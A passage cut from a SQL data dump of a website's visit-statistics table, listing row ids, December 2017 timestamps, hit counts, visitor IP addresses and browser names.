,0,'92.113.73.85','opera'),(183468,1512109472,1,0,1,0,'66.249.64.28',''),(183469,1512109785,1,1,0,0,'217.69.133.243','other'),(183470,1512110008,1,1,0,0,'217.182.132.75','other'),(183471,1512110189,1,1,0,0,'51.255.65.32','other'),(183472,1512110235,1,1,0,0,'8.29.198.26','other'),(183473,1512110289,1,1,0,0,'51.255.65.41','other'),(183474,1512110316,1,1,0,0,'51.255.65.25','other'),(183475,1512110824,1,1,0,0,'217.182.132.61','other'),(183476,1512110909,1,1,0,0,'164.132.162.160','other'),(183477,1512110951,2,2,0,0,'91.196.178.69','chrome'),(183478,1512111278,1,1,0,0,'91.196.178.65','chrome'),(183479,1512111403,1,1,0,0,'137.74.201.99','other'),(183480,1512111415,1,1,0,0,'94.179.7.31','opera'),(183481,1512111885,1,1,0,0,'91.196.178.69','chrome'),(183482,1512111958,1,0,1,0,'66.249.64.30',''),(183483,1512111964,1,1,0,0,'91.196.178.70','chrome'),(183484,1512111992,1,1,0,0,'91.196.177.46','firefox'),(183485,1512112123,1,1,0,0,'51.255.71.112','other'),(183486,1512112236,1,1,0,0,'195.230.119.34','chrome'),(183487,1512112376,1,1,0,0,'180.76.15.143','other'),(183488,1512112963,1,1,0,0,'91.196.178.69','chrome'),(183489,1512112982,1,1,0,0,'51.255.65.13','other'),(183490,1512112992,1,1,0,0,'217.182.132.91','other'),(183491,1512113288,1,1,0,0,'85.195.116.66','chrome'),(183492,1512114458,1,1,0,0,'85.140.18.29','other'),(183493,1512114769,1,1,0,0,'217.69.133.252','other'),(183494,1512115008,1,1,0,0,'141.8.132.19','other'),(183495,1512115082,1,1,0,0,'217.182.132.71','other'),(183496,1512115248,1,0,1,0,'66.249.70.25',''),(183497,1512115286,1,1,0,0,'178.154.200.28','other'),(183498,1512115503,1,1,0,0,'130.180.220.141','chrome'),(183499,1512115831,1,1,0,0,'137.74.207.119','other'),(183500,1512115922,1,1,0,0,'66.249.64.30','chrome'),(183501,1512116284,1,1,0,0,'164.132.164.180','other'),(183502,1512116754,1,1,0,0,'51.255.65.80','other'),(183503,1512117030,1,1,0,0,'164.132.162.160','other'),(183504,1512117302,1,1,0,0,'137.74.207.101','other'),(183505,1512117912,1,1,0,0,'213.180.203.7','other'),(183506,1512118742,1,1,0,0,'217.69.133.241','other'),(183507,1512118815,1,1,0,0,'217.182.132.30','other'),(183508,1512118995,1,1,0,0,'91.209.11.236','other'),(183509,1512119376,1,1,0,0,'217.182.132.185','other'),(183510,1512119429,1,1,0,0,'217.182.132.184','other'),(183511,1512119494,1,1,0,0,'207.46.13.143','other'),(183512,1512119538,1,0,1,0,'66.249.64.30',''),(183513,1512119603,1,1,0,0,'134.249.146.125','chrome'),(183514,1512119710,1,1,0,0,'217.182.132.71','other'),(183515,1512119896,1,1,0,0,'51.255.71.121','other'),(183516,1512120153,1,1,0,0,'51.255.65.61','other'),(183517,1512120399,1,1,0,0,'51.255.71.114','other'),(183518,1512120774,2,2,0,0,'217.182.132.32','other'),(183519,1512120825,1,1,0,0,'46.201.241.5','chrome'),(183520,1512121063,1,1,0,0,'8.29.198.27','other'),(183521,1512121088,1,0,1,0,'66.249.64.28',''),(183522,1512121155,1,1,0,0,'207.46.13.143','other'),(183523,1512121796,1,1,0,0,'91.196.178.70','chrome'),(183524,1512121972,1,1,0,0,'51.255.65.19','other'),(183525,1512122052,1,1,0,0,'217.182.132.6','other'),(183526,1512122337,1,1,0,0,'51.255.65.86','other'),(183527,1512122601,1,1,0,0,'217.182.132.186','other'),(183528,1512122774,1,1,0,0,'51.255.65.74','other'),(183529,1512122867,1,1,0,0,'217.182.132.175','other'),(183530,1512123021,1,1,0,0,'5.45.207.49','other'),(183531,1512123619,1,1,0,0,'217.182.132.188','other'),(183532,1512123876,1,1,0,0,'51.255.71.125','other'),(183533,1512123903,1,0,1,0,'66.249.70.25',''),(183534,1512124921,1,1,0,0,'217.69.133.14','other'),(183535,1512125136,1,1,0,0,'91.196.178.164','chrome'),(183536,1512125459,1,1,0,0,'217.182.132.24','other'),(183537,1512125516,1,1,0,0,'51.255.65.91','other'),(183538,1512125721,1,1,0,0,'217.182.132.152','other'),(183539,1512125856,1,1,0,0,'217.182.132.170','other'),(183540,1512125971,17,17,0,0,'46.4.58.130','other'),(183541,1512126618,1,1,0,0,'37.9.113.182','other'),(183542,1512126624,1,1,0,0,'5.45.207.58','other'),(183543,1512126866,1,1,0,0,'51.255.71.131','other'),(183544,1512127446,1,1,0,0,'217.182.132.29','other'),(183545,1512127625,1,1,0,0,'141.8.142.74','other'),(183546,1512127845,1,1,0,0,'188.166.79.186','chrome'),(183547,1512127902,1,1,0,0,'151.80.27.118','other'),(183548,1512128014,1,0,1,0,'68.180.229.104',''),(183549,1512128159,2,2,0,0,'178.154.171.88','other'),(183550,1512128434,1,1,0,0,'51.255.65.39','other'),(183551,1512129113,1,1,0,0,'51.255.65.94','other'),(183552,1512130397,1,1,0,0,'51.255.71.101','other'),(183553,1512130584,1,1,0,0,'51.255.65.97','other'),(183554,1512131192,1,1,0,0,'207.46.13.79','other'),(183555,1512131318,1,1,0,0,'137.74.201.100','other'),(183556,1512131904,1,1,0,0,'8.29.198.25','other'),(183557,1512131944,1,1,0,0,'217.182.132.147','other'),(183558,1512132114,1,1,0,0,'217.182.132.58','other'),(183559,1512132456,1,1,0,0,'151.80.27.118','other'),(183560,1512132536,1,1,0,0,'217.182.132.23','other'),(183561,1512132591,1,1,0,0,'216.244.66.237','other'),(183562,1512132725,1,1,0,0,'51.255.65.23','other'),(183563,1512133000,1,1,0,0,'37.52.17.192','firefox'),(183564,1512133427,1,1,0,0,'51.255.71.118','other'),(183565,1512134013,1,1,0,0,'37.52.127.229','chrome'),(183566,1512134098,1,0,1,0,'68.180.229.52',''),(183567,1512134213,1,1,0,0,'207.46.13.143','other'),(183568,1512134222,1,1,0,0,'217.69.133.241','other'),(183569,1512134848,1,1,0,0,'217.69.133.23','other'),(183570,1512135140,1,1,0,0,'51.255.65.39','other'),(183571,1512135440,1,1,0,0,'217.182.132.154','other'),(183572,1512135443,1,1,0,0,'217.182.132.30','other'),(183573,1512135504,1,1,0,0,'217.182.132.179','other'),(183574,1512135642,1,1,0,0,'217.182.132.61','other'),(183575,1512136535,1,1,0,0,'91.196.178.68','chrome'),(183576,1512136606,1,1,0,0,'91.196.178.70','chrome'),(183577,1512136676,1,1,0,0,'217.182.132.94','other'),(183578,1512137176,1,1,0,0,'37.9.113.182','other'),(183579,1512137616,1,0,1,0,'66.249.64.30',''),(183580,1512137793,1,1,0,0,'195.88.158.66','chrome'),(183581,1512138012,1,1,0,0,'137.74.201.100','other'),(183582,1512138937,1,1,0,0,'51.255.65.60','other'),(183583,1512139361,1,1,0,0,'178.154.171.88','other'),(183584,1512139955,1,1,0,0,'46.48.13.161','chrome'),(183585,1512140107,1,1,0,0,'137.74.207.116','other'),(183586,1512140143,1,1,0,0,'207.46.13.143','other'),(183587,1512140222,1,1,0,0,'51.255.65.66','other'),(183588,1512140343,1,1,0,0,'217.69.133.241','other'),(183589,1512140717,1,1,0,0,'51.255.65.28','other'),(183590,1512140830,1,1,0,0,'91.196.178.162','chrome'),(183591,1512140848,1,1,0,0,'178.124.220.95','chrome'),(183592,1512140940,1,1,0,0,'217.182.132.173','other'),(183593,1512141925,1,1,0,0,'141.8.142.74','other'),(183594,1512141970,1,1,0,0,'217.182.132.93','other'),(183595,1512141979,1,1,0,0,'164.132.162.156','other'),(183596,1512142384,1,1,0,0,'137.74.203.194','other'),(183597,1512142737,1,1,0,0,'8.29.198.26','other'),(183598,1512142798,1,1,0,0,'51.255.65.47','other'),(183599,1512143453,1,1,0,0,'217.69.133.13','other'),(183600,1512143623,1,1,0,0,'51.255.65.82','other'),(183601,1512143636,2,2,0,0,'141.8.142.74','other'),(183602,1512143670,1,1,0,0,'51.255.65.30','other'),(183603,1512143988,1,1,0,0,'51.255.65.71','other'),(183604,1512144579,1,1,0,0,'51.255.71.98','other'),(183605,1512144857,1,1,0,0,'51.255.71.125','other'),(183606,1512145247,1,1,0,0,'51.255.65.79','other'),(183607,1512145623,1,1,0,0,'207.46.13.79','other'),(183608,1512145659,1,1,0,0,'51.255.65.14','other'),(183609,1512145665,1,1,0,0,'217.182.132.181','other'),(183610,1512145882,1,1,0,0,'217.182.132.54','other'),(183611,1512146002,1,1,0,0,'217.182.132.149','other'),(183612,1512146656,1,1,0,0,'217.182.132.22','other'),(183613,1512146691,1,1,0,0,'217.69.133.237','other'),(183614,1512147495,1,1,0,0,'217.182.132.150','other'),(183615,1512147714,1,1,0,0,'217.182.132.16','other'),(183616,1512147904,1,1,0,0,'157.55.39.210','other'),(183617,1512148013,1,1,0,0,'51.255.65.54','other'),(183618,1512148707,1,1,0,0,'51.255.65.15','other'),(183619,1512149708,1,1,0,0,'217.182.132.6','other'),(183620,1512150274,1,1,0,0,'51.255.65.90','other'),(183621,1512150304,1,1,0,0,'81.213.185.16','other'),(183622,1512150740,1,1,0,0,'91.196.178.45','chrome'),(183623,1512151140,1,1,0,0,'51.255.65.224','other'),(183624,1512151419,1,1,0,0,'180.76.15.144','other'),(183625,1512151766,1,1,0,0,'157.55.39.253','other'),(183626,1512151795,1,0,1,0,'66.249.70.27',''),(183627,1512151848,1,1,0,0,'37.55.57.49','chrome'),(183628,1512151955,1,1,0,0,'141.8.142.74','other'),(183629,1512152132,1,1,0,0,'37.55.174.242','chrome'),(183630,1512152301,1,1,0,0,'66.249.64.29','chrome'),(183631,1512152798,3,3,0,0,'37.55.57.49','chrome'),(183632,1512152830,1,1,0,0,'173.252.91.252','other'),(183633,1512152832,1,1,0,0,'173.252.88.250','other'),(183634,1512152834,1,1,0,0,'69.63.188.217','other'),(183635,1512152911,1,1,0,0,'94.178.7.66','chrome'),(183636,1512153136,1,1,0,0,'82.145.221.243','chrome'),(183637,1512153213,4,4,0,0,'91.196.177.62','other'),(183638,1512153251,1,1,0,0,'95.132.30.145','chrome'),(183639,1512153293,1,1,0,0,'95.132.27.232','chrome'),(183640,1512153505,1,1,0,0,'37.190.163.241','chrome'),(183641,1512153572,1,1,0,0,'8.29.198.25','other'),(183642,1512153700,1,1,0,0,'37.55.57.49','chrome'),(183643,1512154051,1,1,0,0,'91.196.178.45','chrome'),(183644,1512154109,1,1,0,0,'217.69.133.241','other'),(183645,1512154216,1,1,0,0,'94.178.117.201','chrome'),(183646,1512154227,1,1,0,0,'37.73.220.27','other'),(183647,1512154262,7,7,0,0,'77.90.193.14','other'),(183648,1512154301,1,1,0,0,'92.113.174.247','chrome'),(183649,1512154358,1,1,0,0,'91.196.178.135','chrome'),(183650,1512154461,1,1,0,0,'95.134.97.25','chrome'),(183651,1512154472,1,1,0,0,'95.133.238.149','firefox'),(183652,1512154483,1,1,0,0,'95.132.90.113','chrome'),(183653,1512154496,1,1,0,0,'91.196.178.133','chrome'),(183654,1512154560,1,1,0,0,'91.196.178.167','other'),(183655,1512154667,1,1,0,0,'95.132.2.172','chrome'),(183656,1512154683,1,1,0,0,'95.132.2.172','firefox'),(183657,1512154712,1,1,0,0,'91.196.178.41','chrome'),(183658,1512154716,1,1,0,0,'217.69.133.221','other'),(183659,1512154729,1,1,0,0,'91.196.178.46','chrome'),(183660,1512154753,1,1,0,0,'37.73.252.8','chrome'),(183661,1512154797,1,1,0,0,'37.73.252.203','chrome'),(183662,1512154825,1,1,0,0,'91.196.178.99','other'),(183663,1512154829,1,1,0,0,'91.196.178.161','chrome'),(183664,1512154846,1,1,0,0,'91.196.178.162','other'),(183665,1512154994,5,5,0,0,'91.196.177.62','other'),(183666,1512155027,1,1,0,0,'213.108.46.125','other'),(183667,1512155055,1,1,0,0,'91.196.178.162','chrome'),(183668,1512155069,2,2,0,0,'37.55.57.49','chrome'),(183669,1512155152,1,1,0,0,'37.52.20.150','chrome'),(183671,1512155155,1,1,0,0,'91.196.178.102','other'),(183672,1512155175,1,1,0,0,'178.95.245.178','chrome'),(183673,1512155177,1,1,0,0,'46.133.224.57','chrome'),(183674,1512155257,1,1,0,0,'91.124.181.146','chrome'),(183675,1512155260,1,1,0,0,'46.133.108.250','other'),(183676,1512155306,1,1,0,0,'193.107.3.67','other'),(183677,1512155354,1,1,0,0,'91.124.83.22','chrome'),(183678,1512155470,1,1,0,0,'91.196.178.36','chrome'),(183679,1512155555,1,1,0,0,'91.196.178.165','chrome'),(183680,1512155656,1,1,0,0,'46.211.66.115','other'),(183681,1512155711,1,1,0,0,'176.36.246.102','other'),(183682,1512155714,1,1,0,0,'46.211.144.109','other'),(183683,1512155730,1,1,0,0,'91.124.182.190','chrome'),(183684,1512155747,1,1,0,0,'95.134.220.114','chrome'),(183685,1512155779,1,1,0,0,'37.53.225.245','chrome'),(183686,1512155842,1,1,0,0,'91.196.178.67','chrome'),(183687,1512155875,2,2,0,0,'91.196.178.136','chrome'),(183688,1512155905,1,0,1,0,'66.249.70.27',''),(183689,1512155924,1,1,0,0,'46.211.144.109','chrome'),(183690,1512155946,1,1,0,0,'185.120.133.137','chrome'),(183691,1512155993,1,1,0,0,'93.91.150.77','other'),(183692,1512155996,1,1,0,0,'37.55.57.49','chrome'),(183693,1512156010,1,1,0,0,'95.158.62.16','firefox'),(183694,1512156045,1,1,0,0,'188.166.93.120','chrome'),(183695,1512156046,2,2,0,0,'37.53.229.226','chrome'),(183696,1512156123,1,1,0,0,'92.112.225.255','other'),(183697,1512156188,1,1,0,0,'92.112.124.129','firefox'),(183698,1512156328,1,1,0,0,'37.54.21.197','other'),(183699,1512156362,1,1,0,0,'46.133.6.188','other'),(183700,1512156401,1,1,0,0,'217.69.133.236','other'),(183701,1512156472,1,1,0,0,'95.132.53.11','firefox'),(183702,1512156493,1,1,0,0,'109.86.21.185','other'),(183703,1512156505,1,1,0,0,'91.196.178.168','chrome'),(183704,1512156522,1,1,0,0,'37.54.115.187','chrome'),(183705,1512156534,1,1,0,0,'91.196.178.133','chrome'),(183706,1512156547,1,1,0,0,'91.196.178.66','chrome'),(183707,1512156578,1,1,0,0,'37.73.234.38','chrome'),(183708,1512156579,1,1,0,0,'217.182.132.151','other'),(183709,1512156594,1,1,0,0,'91.226.253.89','chrome'),(183710,1512156682,1,1,0,0,'46.201.175.246','other'),(183711,1512156781,1,1,0,0,'91.196.178.35','chrome'),(183712,1512156827,1,1,0,0,'37.54.114.95','chrome'),(183713,1512156961,2,2,0,0,'91.196.178.98','chrome'),(183714,1512156986,1,1,0,0,'37.73.195.208','other'),(183715,1512156987,1,1,0,0,'93.84.36.191','chrome'),(183716,1512156991,1,1,0,0,'95.135.240.217','other'),(183717,1512156992,1,1,0,0,'51.255.65.80','other'),(183718,1512157003,1,1,0,0,'46.211.127.44','chrome'),(183719,1512157024,1,1,0,0,'50.195.241.86','chrome'),(183720,1512157025,1,1,0,0,'178.255.215.94','other'),(183721,1512157036,1,1,0,0,'37.73.214.21','other'),(183722,1512157141,1,1,0,0,'94.254.173.75','other'),(183723,1512157217,1,1,0,0,'37.55.57.214','chrome'),(183724,1512157323,1,1,0,0,'178.92.72.141','chrome'),(183725,1512157327,1,1,0,0,'207.46.13.79','other'),(183726,1512157353,1,1,0,0,'41.207.14.244','firefox'),(183727,1512157354,1,1,0,0,'91.196.178.132','chrome'),(183729,1512157357,1,1,0,0,'193.194.127.219','other'),(183730,1512157367,1,1,0,0,'178.196.20.183','chrome'),(183731,1512157432,1,1,0,0,'95.158.23.104','chrome'),(183732,1512157459,1,1,0,0,'91.196.178.97','chrome'),(183733,1512157486,1,1,0,0,'185.182.81.4','chrome'),(183734,1512157488,1,1,0,0,'51.255.65.34','other'),(183735,1512157498,1,1,0,0,'95.132.34.146','other'),(183736,1512157588,1,1,0,0,'77.222.148.36','chrome'),(183737,1512157640,1,1,0,0,'217.182.132.19','other'),(183738,1512157699,1,1,0,0,'187.175.224.18','other'),(183739,1512157810,1,1,0,0,'88.21.92.119','other'),(183740,1512157894,1,1,0,0,'95.134.168.76','firefox'),(183741,1512157992,1,0,1,0,'66.249.70.27',''),(183742,1512158020,1,1,0,0,'91.232.158.18','other'),(183743,1512158064,1,1,0,0,'188.166.25.101','chrome'),(183744,1512158151,1,1,0,0,'95.132.4.215','other'),(183745,1512158154,1,1,0,0,'46.211.98.227','chrome'),(183746,1512158169,1,1,0,0,'91.196.178.136','chrome'),(183747,1512158185,1,1,0,0,'94.178.114.176','chrome'),(183748,1512158260,1,1,0,0,'91.196.178.101','chrome'),(183749,1512158480,1,1,0,0,'217.182.132.54','other'),(183750,1512158655,1,1,0,0,'93.72.140.69','other'),(183751,1512158790,2,2,0,0,'91.196.178.44','chrome'),(183752,1512158803,1,1,0,0,'41.141.220.246','chrome'),(183753,1512158820,1,1,0,0,'178.95.66.250','chrome'),(183754,1512158823,1,1,0,0,'185.26.183.24','chrome'),(183755,1512158878,2,2,0,0,'91.196.178.71','chrome'),(183756,1512158900,1,1,0,0,'37.73.208.59','chrome'),(183757,1512158919,1,1,0,0,'95.132.22.163','chrome'),(183758,1512158921,1,1,0,0,'176.37.106.51','other'),(183759,1512158949,1,1,0,0,'37.53.224.162','chrome'),(183760,1512159252,2,2,0,0,'46.211.148.77','other'),(183761,1512159265,1,1,0,0,'91.196.178.101','chrome'),(183762,1512159288,1,1,0,0,'91.196.178.100','chrome'),(183763,1512159329,1,1,0,0,'185.138.228.227','chrome'),(183764,1512159376,1,1,0,0,'46.211.148.77','chrome'),(183765,1512159392,2,2,0,0,'46.211.101.24','other'),(183766,1512159458,1,1,0,0,'66.222.145.201','other'),(183767,1512159494,1,1,0,0,'178.92.248.224','chrome'),(183768,1512159503,2,2,0,0,'37.73.172.80','other'),(183769,1512159531,1,1,0,0,'91.196.178.50','chrome'),(183770,1512159589,1,1,0,0,'207.46.13.143','other'),(183771,1512159686,1,1,0,0,'188.166.57.126','chrome'),(183772,1512159855,1,1,0,0,'91.196.178.55','firefox'),(183773,1512159959,1,1,0,0,'178.92.250.254','chrome'),(183774,1512159974,1,1,0,0,'51.255.65.95','other'),(183775,1512160015,1,1,0,0,'92.113.174.133','chrome'),(183776,1512160016,1,1,0,0,'91.196.178.58','chrome'),(183777,1512160202,1,1,0,0,'46.133.9.80','chrome'),(183778,1512160249,1,1,0,0,'37.73.170.74','other'),(183779,1512160350,1,1,0,0,'193.106.56.125','other'),(183780,1512160435,1,1,0,0,'185.11.28.202','chrome'),(183781,1512160438,1,1,0,0,'95.135.240.201','other'),(183782,1512160593,1,1,0,0,'95.132.43.255','firefox'),(183783,1512160911,1,1,0,0,'92.112.124.18','chrome'),(183784,1512160947,1,1,0,0,'188.147.233.237','chrome'),(183785,1512160951,1,1,0,0,'91.196.178.56','chrome'),(183786,1512160968,1,1,0,0,'91.196.178.133','firefox'),(183787,1512160977,1,1,0,0,'217.182.132.29','other'),(183788,1512160995,2,2,0,0,'91.196.178.36','other'),(183789,1512161008,1,1,0,0,'91.196.178.164','chrome'),(183790,1512161041,1,1,0,0,'82.193.115.183','chrome'),(183791,1512161045,1,1,0,0,'91.196.178.68','chrome'),(183792,1512161047,1,1,0,0,'173.252.86.67','other'),(183793,1512161082,1,0,1,0,'68.180.229.52',''),(183794,1512161114,1,1,0,0,'185.190.149.1','other'),(183795,1512161204,1,1,0,0,'91.196.178.130','chrome'),(183796,1512161219,1,1,0,0,'91.196.178.97','chrome'),(183797,1512161265,1,1,0,0,'24.15.65.106','other'),(183798,1512161279,1,1,0,0,'91.196.178.70','chrome'),(183799,1512161362,1,1,0,0,'91.196.178.52','chrome'),(183800,1512161406,1,1,0,0,'188.163.16.13','other'),(183801,1512161433,1,1,0,0,'178.95.156.151','chrome'),(183802,1512161603,1,1,0,0,'217.182.132.81','other'),(183803,1512161622,1,1,0,0,'91.196.178.53','chrome'),(183804,1512161687,1,1,0,0,'207.154.199.40','other'),(183805,1512161698,1,1,0,0,'217.182.132.34','other'),(183806,1512161782,1,1,0,0,'178.251.109.244','other'),(183807,1512161823,2,2,0,0,'95.164.1.198','other'),(183808,1512161843,1,1,0,0,'91.196.178.129','chrome'),(183809,1512161845,1,1,0,0,'37.73.232.236','chrome'),(183810,1512161872,1,1,0,0,'185.138.228.235','chrome'),(183811,1512161894,1,1,0,0,'91.196.178.132','chrome'),(183812,1512161925,1,1,0,0,'217.182.132.175','other'),(183813,1512161934,1,1,0,0,'217.182.132.91','other'),(183814,1512162089,1,1,0,0,'37.73.224.43','chrome'),(183815,1512162095,1,1,0,0,'138.68.105.60','other'),(183816,1512162208,1,1,0,0,'91.196.177.98','other'),(183817,1512162272,1,1,0,0,'213.111.123.42','other'),(183818,1512162285,1,1,0,0,'37.55.57.49','firefox'),(183819,1512162367,1,1,0,0,'91.196.178.70','firefox'),(183820,1512162409,1,1,0,0,'93.72.115.97','other'),(183821,1512162458,1,1,0,0,'130.180.210.116','chrome'),(183822,1512162468,1,1,0,0,'37.54.114.172','chrome'),(183823,1512162481,2,2,0,0,'193.53.83.21','chrome'),(183824,1512162533,1,1,0,0,'91.196.178.162','chrome'),(183825,1512162752,1,1,0,0,'37.53.110.249','chrome'),(183826,1512162780,1,1,0,0,'46.133.199.118','chrome'),(183827,1512162792,1,1,0,0,'91.196.178.72','other'),(183828,1512162828,1,1,0,0,'51.255.65.44','other'),(183829,1512162953,1,1,0,0,'37.55.58.84','chrome'),(183830,1512162963,1,1,0,0,'176.36.246.102','other'),(183831,1512163051,1,1,0,0,'46.121.203.152','chrome'),(183832,1512163142,1,1,0,0,'91.196.178.99','firefox'),(183833,1512163165,1,1,0,0,'184.75.221.92','other'),(183834,1512163195,1,1,0,0,'178.93.148.159','chrome'),(183835,1512163284,1,1,0,0,'137.74.207.110','other'),(183836,1512163376,1,1,0,0,'91.196.178.61','chrome'),(183837,1512163432,1,1,0,0,'91.196.178.100','other'),(183838,1512163446,1,1,0,0,'46.112.44.200','chrome'),(183839,1512163509,1,1,0,0,'193.93.163.224','other'),(183840,1512163511,1,1,0,0,'95.133.38.215','chrome'),(183841,1512163548,1,1,0,0,'91.196.177.78','chrome'),(183842,1512163581,1,1,0,0,'165.227.142.252','chrome'),(183843,1512163690,1,1,0,0,'91.196.178.102','chrome'),(183844,1512163700,1,1,0,0,'139.59.143.81','chrome'),(183845,1512163764,1,1,0,0,'66.249.64.29','chrome'),(183846,1512163777,1,1,0,0,'91.196.178.134','chrome'),(183847,1512163789,1,1,0,0,'81.219.20.2','other'),(183848,1512163791,1,1,0,0,'66.249.70.29','chrome'),(183849,1512163852,1,1,0,0,'85.202.97.228','chrome'),(183850,1512163873,1,1,0,0,'91.233.90.34','other'),(183851,1512163990,1,1,0,0,'91.196.178.136','chrome'),(183852,1512164001,1,1,0,0,'89.185.0.4','chrome'),(183853,1512164013,1,1,0,0,'91.196.178.133','other'),(183854,1512164015,1,1,0,0,'91.218.72.112','other'),(183855,1512164025,1,1,0,0,'91.196.178.34','chrome'),(183856,1512164042,1,1,0,0,'188.130.176.226','chrome'),(183857,1512164126,1,1,0,0,'46.211.7.84','chrome'),(183858,1512164299,1,1,0,0,'217.69.133.242','other'),(183859,1512164306,1,1,0,0,'46.219.11.166','chrome'),(183860,1512164331,1,1,0,0,'51.52.42.167','other'),(183861,1512164341,1,1,0,0,'85.115.224.151','other'),(183862,1512164372,1,1,0,0,'46.219.221.109','other'),(183863,1512164400,1,1,0,0,'8.29.198.26','other'),(183864,1512164468,1,1,0,0,'95.67.23.32','other'),(183865,1512164544,1,1,0,0,'46.211.105.107','other'),(183866,1512164603,1,1,0,0,'37.115.200.106','other'),(183867,1512164642,1,1,0,0,'31.134.120.103','other'),(183868,1512164659,1,1,0,0,'91.196.178.68','chrome'),(183869,1512164697,1,1,0,0,'95.164.1.198','other'),(183870,1512164699,1,1,0,0,'37.26.147.170','chrome'),(183871,1512164962,1,1,0,0,'91.196.178.136','chrome'),(183872,1512165138,1,1,0,0,'91.196.178.70','chrome'),(183873,1512165255,1,1,0,0,'92.112.124.194','chrome'),(183874,1512165278,1,1,0,0,'217.182.132.153','other'),(183875,1512165309,1,1,0,0,'91.196.178.134','chrome'),(183876,1512165315,1,1,0,0,'70.214.115.100','other'),(183877,1512165337,1,1,0,0,'91.196.178.104','chrome'),(183878,1512165425,1,1,0,0,'78.111.189.244','other'),(183879,1512165463,1,1,0,0,'207.154.241.75','chrome'),(183880,1512165464,1,1,0,0,'51.255.65.41','other'),(183881,1512165559,1,1,0,0,'31.43.31.4','other'),(183882,1512165747,1,1,0,0,'91.196.178.134','other'),(183883,1512165810,1,1,0,0,'188.170.80.83','chrome'),(183884,1512165858,1,1,0,0,'178.92.249.141','chrome'),(183885,1512165880,1,1,0,0,'178.137.208.243','other'),(183886,1512165882,1,1,0,0,'146.0.85.37','other'),(183887,1512165885,1,1,0,0,'93.79.116.60','other'),(183888,1512166030,1,1,0,0,'91.196.178.33','chrome'),(183889,1512166124,1,1,0,0,'92.112.104.170','chrome'),(183890,1512166202,1,1,0,0,'178.54.249.181','other'),(183891,1512166218,1,1,0,0,'46.219.220.131','other'),(183892,1512166323,1,1,0,0,'95.132.55.182','chrome'),(183893,1512166328,1,1,0,0,'108.59.8.70','other'),(183894,1512166376,1,1,0,0,'37.73.179.34','chrome'),(183895,1512166559,2,2,0,0,'37.53.231.139','chrome'),(183896,1512166577,1,1,0,0,'92.176.233.165','other'),(183897,1512166748,1,1,0,0,'217.182.132.27','other'),(183898,1512166786,1,1,0,0,'178.251.109.241','other'),(183899,1512166798,1,1,0,0,'92.113.190.51','chrome'),(183900,1512166949,1,1,0,0,'178.137.154.127','chrome'),(183901,1512166968,1,1,0,0,'188.166.121.88','chrome'),(183902,1512167140,1,1,0,0,'37.115.130.4','other'),(183903,1512167195,1,1,0,0,'178.92.85.218','other'),(183904,1512167244,1,1,0,0,'5.9.147.133','other'),(183905,1512167336,1,1,0,0,'137.74.201.100','other'),(183906,1512167379,1,1,0,0,'193.194.127.111','chrome'),(183907,1512167417,1,1,0,0,'185.56.211.106','chrome'),(183908,1512167650,1,1,0,0,'207.46.13.143','other'),(183909,1512167722,1,1,0,0,'157.55.39.253','other'),(183910,1512167912,1,1,0,0,'62.44.134.138','other'),(183911,1512168012,1,1,0,0,'31.134.120.106','chrome'),(183912,1512168869,1,1,0,0,'164.132.162.187','other'),(183913,1512169047,1,1,0,0,'138.246.2.136','chrome'),(183914,1512169061,1,1,0,0,'46.140.178.19','other'),(183915,1512169230,1,1,0,0,'141.8.142.74','other'),(183916,1512169361,1,0,1,0,'66.249.70.29',''),(183917,1512169365,1,1,0,0,'217.182.132.87','other'),(183918,1512169486,1,1,0,0,'185.182.81.41','chrome'),(183919,1512169566,1,1,0,0,'81.89.217.254','other'),(183920,1512169717,1,1,0,0,'93.175.226.180','other'),(183921,1512169845,1,1,0,0,'213.179.252.169','chrome'),(183922,1512169852,1,1,0,0,'217.69.133.235','other'),(183923,1512169940,1,1,0,0,'217.182.132.153','other'),(183924,1512169985,1,1,0,0,'46.211.150.11','other'),(183925,1512170001,1,0,1,0,'68.180.229.52',''),(183926,1512170049,1,1,0,0,'51.255.65.73','other'),(183927,1512170533,1,1,0,0,'217.69.133.84','other'),(183928,1512170760,1,1,0,0,'66.110.216.10','other'),(183929,1512170852,1,1,0,0,'217.182.132.59','other'),(183930,1512170983,1,1,0,0,'217.182.132.176','other'),(183931,1512171221,1,0,1,0,'66.249.64.28',''),(183932,1512171418,1,1,0,0,'51.255.65.20','other'),(183933,1512172595,1,1,0,0,'137.74.207.159','other'),(183934,1512172618,1,1,0,0,'217.69.133.232','other'),(183935,1512173327,1,1,0,0,'159.89.3.68','chrome'),(183936,1512173573,1,1,0,0,'141.8.142.74','other'),(183937,1512174267,1,1,0,0,'51.255.65.35','other'),(183938,1512174442,1,1,0,0,'217.182.132.52','other'),(183939,1512174899,1,1,0,0,'217.182.132.184','other'),(183940,1512174942,1,1,0,0,'217.182.132.35','other'),(183941,1512175227,1,1,0,0,'8.29.198.26','other'),(183942,1512175286,1,1,0,0,'51.255.71.132','other'),(183943,1512175401,1,1,0,0,'185.191.178.39','other'),(183944,1512175475,1,1,0,0,'217.182.132.170','other'),(183945,1512175915,1,1,0,0,'217.182.132.174','other'),(183946,1512175969,1,1,0,0,'51.255.65.24','other'),(183947,1512177103,1,1,0,0,'178.154.171.88','other'),(183948,1512177317,1,1,0,0,'40.77.167.40','other'),(183949,1512177371,1,1,0,0,'157.55.39.253','other'),(183950,1512177450,1,0,1,0,'66.249.64.28',''),(183951,1512177900,1,1,0,0,'93.74.48.14','other'),(183952,1512178981,1,1,0,0,'41.223.216.237','other'),(183953,1512179427,1,1,0,0,'46.211.70.123','chrome'),(183954,1512179596,1,1,0,0,'172.56.12.13','chrome'),(183955,1512181150,1,1,0,0,'178.154.171.88','other'),(183956,1512181978,1,1,0,0,'91.196.178.136','chrome'),(183957,1512182002,1,1,0,0,'40.77.167.40','other'),(183958,1512182772,1,1,0,0,'141.8.142.74','other'),(183959,1512182926,1,1,0,0,'87.250.224.46','other'),(183960,1512183055,1,1,0,0,'91.196.178.161','other'),(183961,1512183891,1,1,0,0,'107.167.109.180','other'),(183962,1512183964,2,2,0,0,'141.8.142.74','other'),(183963,1512184117,1,1,0,0,'93.72.111.37','other'),(183964,1512185253,1,1,0,0,'141.8.142.74','other'),(183965,1512185590,1,0,1,0,'66.249.64.29',''),(183966,1512185713,1,1,0,0,'178.154.171.88','other'),(183967,1512186054,1,1,0,0,'8.29.198.26','other'),(183968,1512186249,1,1,0,0,'46.211.5.57','chrome'),(183969,1512186537,1,1,0,0,'91.209.11.236','other'),(183970,1512186553,1,1,0,0,'193.106.56.69','other'),(183971,1512186575,1,1,0,0,'217.69.133.70','other'),(183972,1512186611,1,1,0,0,'80.187.100.224','chrome'),(183973,1512186726,1,1,0,0,'5.